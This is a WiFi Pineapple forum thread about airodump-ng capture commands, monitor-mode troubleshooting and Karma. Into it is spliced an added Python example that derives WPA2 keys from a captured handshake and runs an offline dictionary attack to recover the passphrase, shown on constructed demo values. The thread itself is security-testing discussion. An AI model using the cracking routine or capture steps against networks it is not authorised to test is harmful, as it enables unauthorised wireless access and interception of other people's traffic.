JohnnyBoy
Posts: 5
Posts posted by JohnnyBoy
You got it all mixed up. Why the f are you trying to airodump on a pineapple? You could just do that on your laptop with the built in wifi card. You are making it too complicated. The pineapple is for MITM'ing people, not using as a super complicated passive sniffer.
You are right, in a sense...
Why use the pineapple for anything else wifi related when I could just plug in a wifi usb card to my android phone and use it for everything?
Then it would be why do that when I could modify the wifi driver (because I am a programmer) to accept monitor mode?
Laptop, no, that is ten times the size.
I bought the pineapple before doing any of that because it is popular and I wanted to see how it was done right before experimenting.
But, it has a nice form factor, does a lot of things right, and it is fun to play with openwrt.
Airodump only takes one command, btw, if started in monitor mode.
You can run reaver, airodump, everything right there from the box and do all the MITM stuff my phone can do, but more reliably,
and in my case with a much bigger antenna.
-
It's not all about MITM though, with the greatest fruit of them all you can do amazing security stuff, MITM or not.
-Foxtrot
Yep. And more, it is a nice little openwrt box.
-
I am able to get that to work:
iwconfig wlan0 key 'xxxxx' mode managed essid 'nameofap' ap 11:11:11:11:11:11 channel 1
For instance. Take down the interface before the above command, bring it up afterwards, then
let airodump-ng go: airodump-ng -w /usb/filename wlan0
When you connect to an encrypted AP you are going to need to get the four-way handshake
for decrypting it afterwards. It will be encrypted in your pcap file. Use Wireshark on your android/pc/etc
and google Wireshark decryption for explicit instructions.
There is good documentation for it. One tip: enable the wifi bar so you don't have to search the
options interface every time.
On capturing traffic: I am experimenting with this myself. I am finding with a basic 5 dB or 10 dB omnidirectional
antenna the results are "meh". My theory is that this is because the APs have much more tx power than
the clients (gaming systems, computers, wifi phones, etc).
I am a little lost as to why everyone doesn't just use the system in monitor mode, why even have jasager/karma,
but the results I have heard from karma are excellent (for instance, in malls, see the Ars Technica article on mobile bugs, a good
article pimping the pineapple from Dan Kuykendall of NT Objectives).... versus the results I see from monitor
mode are "meh".
Theoretically, you should be able to get enough bad traffic, if it is not SSL encrypted, if you keep it on open
networks for a while to say "this network should not be open".
In practice, I am finding that not to be the case, myself, but I am a noob at this. (I am an ancient and professional
sec guy, just have not worked with wifi before much.)
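The post above says the captured traffic stays encrypted in the pcap until you feed Wireshark the four-way handshake. The block below is an added example (not code from this thread or from Hak5) showing what that decryption step does under the hood: derive the PMK from passphrase and SSID, expand it to the PTK using the two MACs and the two nonces from the handshake, and check the EAPOL-Key MIC with the KCK. The same MIC check is what an offline dictionary attack runs per candidate passphrase. The SSID, MAC addresses, nonces and passphrase are constructed for the demo; the TK slice of the PTK is what would go on to decrypt the CCMP data frames (AES-CCM is not implemented here, as the standard library has no AES).

```python
"""WPA2-PSK four-way handshake: PMK -> PTK -> EAPOL-Key MIC check.

Added example with constructed values (not a real capture). Shows why the
handshake must be present in the pcap before traffic can be decrypted, and
why the same check doubles as an offline passphrase-guessing attack.
"""
import hashlib
import hmac

# Byte offsets inside an EAPOL-Key frame (802.1X header + key descriptor).
SNONCE_OFFSET = 17
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: 802.11i pairwise key expansion over both MACs and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]  # KCK = [0:16], KEK = [16:32], TK = [32:48] (TK decrypts CCMP data)


def eapol_key_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """Construct a minimal handshake message 2 (supplicant -> AP) EAPOL-Key frame."""
    body = (
        b"\x02"                  # descriptor type: RSN (WPA2)
        + b"\x01\x0a"            # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC bit set
        + b"\x00\x10"            # key length
        + b"\x00" * 7 + b"\x01"  # replay counter
        + snonce                 # 32-byte supplicant nonce
        + b"\x00" * 16           # key IV
        + b"\x00" * 8            # key RSC
        + b"\x00" * 8            # key ID
        + mic                    # 16-byte MIC
        + b"\x00\x00"            # key data length (no key data in this demo)
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type EAPOL-Key


def verify_handshake(passphrase: str, ssid: str, aa: bytes, spa: bytes, anonce: bytes, msg2: bytes) -> bool:
    """True if the MIC in msg2 was computed under the PTK derived from this passphrase."""
    snonce = msg2[SNONCE_OFFSET:SNONCE_OFFSET + 32]
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_key_mic(kck, msg2), msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN])


def recover_passphrase(candidates, ssid, aa, spa, anonce, msg2):
    """Offline dictionary attack: the first candidate whose MIC matches, or None."""
    for cand in candidates:
        if verify_handshake(cand, ssid, aa, spa, anonce, msg2):
            return cand
    return None


# Constructed demo values (hypothetical network, not a real capture).
SSID = "nameofap"
AA = bytes.fromhex("111111111111")       # AP (authenticator) MAC
SPA = bytes.fromhex("000c42aabbcc")      # client (supplicant) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
PASSPHRASE = "pineapple-demo"


def make_demo_msg2(passphrase: str = PASSPHRASE) -> bytes:
    """Produce the message 2 a client using this passphrase would have sent."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_key_mic(kck, build_msg2(SNONCE)))


if __name__ == "__main__":
    msg2 = make_demo_msg2()
    print("correct passphrase verifies:", verify_handshake(PASSPHRASE, SSID, AA, SPA, ANONCE, msg2))
    print("wrong passphrase verifies:  ", verify_handshake("password", SSID, AA, SPA, ANONCE, msg2))
    print("recovered from wordlist:    ",
          recover_passphrase(["letmein", "password", PASSPHRASE], SSID, AA, SPA, ANONCE, msg2))
```

Without message 2 (or message 3) in the capture there is no MIC to test against and no nonces to expand the PMK with, which is why airodump-ng has to see a client associate before the pcap is decryptable; it is also why a network whose passphrase is in a wordlist falls to the loop in recover_passphrase regardless of antenna gain.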
-
Hey, I am unable to get monitor mode going in 2.8 unless I change /etc/config/wireless to have wlan0 start in monitor mode.
All of the old ways to do this do not seem to work anyway. Pre-2.8 I was able to get it going, where wlan0 would stay in Master mode while mon0 would channel skip and get all traffic.
To keep this post brief, I tried about every "what should work" method, and tried them all prefacing with killall hostapd before them, rebooting after every try just to make sure.
For instance, the below methods do not work; they channel skip correctly, but nothing comes up. And the card is working, as I test this against it in monitor mode at start up. But I tried many other possibilities as well.

1.
killall hostapd
ifconfig wlan0 down
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0
NO... does not work...

2.
killall hostapd
ifconfig wlan0 down
airmon-ng start wlan0
airodump-ng mon0
(basically keep wlan0 down)
NO...

Now try:
[stop the wireless service in the GUI before continuing for 2.7.0+]
airmon-ng start wlan0
airodump-ng mon0
NO, catches nothing....

5.
killall hostapd
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airodump-ng wlan0
nothing....

I also tried iterations of all of the above without killall hostapd.

On 2.7 I did not have this written down, but think it was simply
ifconfig wlan0 down
airmon-ng start wlan0
ifconfig wlan0 up
airodump-ng wlan0
Or something like that.

Any advice or what works for you would be appreciated. Even if "this works for me"..... I do have some custom setups... nothing that should affect this, but some which possibly could. (Karma is off, AP is running encryption and not broadcasting, web folder is on USB...)
(Basically, my goal is to have this going, plugged into a battery pack with my android wireless going into it and no command ethernet port being used, so I can better walk around and get readings and perform tests for my company's network security.)
Sniffing open networks (in WiFi Pineapple Mark IV)
The pineapple clearly can do much more than just jasager (modified karma).
You can do every wifi pen test you need to do from it, and much more than that.
It has a far smaller form factor than your laptop, and will perform a lot better than
your android phone with a usb dongle or modified wifi driver.
Karma/Jasager is one thing you can do with it very well. But you can also run
Karma on your phone. Or take ten seconds to download and run DSploit, if
you can't figure out hacked up wifi drivers or getting backtrack on there.
You should know that karma/jasager is detectable. You do not even need to
spoof legacy SSIDs to it. You can just look at your wifi device and see that all
of your legacy SSIDs are there on the network.
Gee whiz, my work AP is here in the neighborhood? How did that happen.
That is, though, a useful test system.
I have, as well, the pineapple running for a good ten hours on a single battery
that is very small.
It has some cool UI features, though you should secure that.